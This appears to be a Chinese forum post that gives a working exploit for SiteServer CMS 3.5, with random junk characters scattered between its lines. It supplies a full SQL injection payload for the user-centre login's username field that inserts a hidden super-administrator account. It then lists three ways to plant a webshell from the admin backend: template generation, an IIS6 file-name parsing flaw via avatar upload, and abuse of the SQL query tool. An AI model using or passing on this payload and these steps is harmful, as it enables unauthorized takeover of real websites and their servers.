经测试秒杀最新的3.5版
. O4 h! H; N% ]2 W/ U+ }. k" Lstieserver官网:www.siteserver.cn( U1 Z" H: D7 F) Z# w
EXP:) F& ~9 j" j( Y. q0 q
直接访问UserCenter/login.aspx
/ I0 `8 b) Y) [; K& ]用户名处输入:
5 p7 g; X0 t# B: I# e5 ?/ D% i& w/ y9 B2 Y- f! X5 d% q4 o
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–% T. [; S/ }9 i0 _) r; d" x: M
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。+ H% K' b% K& c; I" O7 ]
之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ Y3 v9 C6 I0 q' C后台拿webshell的三种方法:8 x7 T0 P+ T" |% \5 j& r, g- G
一、
r$ V# _6 C! W8 X1 V/ k站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
7 H: j5 Y, Z/ i5 b* A二、
. A+ G6 Y( }1 S) M成员权限-》添加用户-》用户名为:1.asp
! p! \( i, v dhttp://127.0.0.1/usercenter/$ t s" }' Y/ \
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell& u6 S1 R9 f) ] o% M) e
(ps:后台添加用户时不会验证是否含有非法字符)
) P# K% N# ~2 ^4 }, O$ R6 q/ f三、7 K- B! A4 r$ O( T1 ~/ A2 e5 P
系统工具-》实用工具-》机器参数查看
! q8 c1 {3 l/ ~. k) u可以看到数据库类型、名称,WEB路径" P( t* G. [6 h
系统工具-》数据库工具-》SQL语句查询4 `" l" k( Z3 C- f; Z- p
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |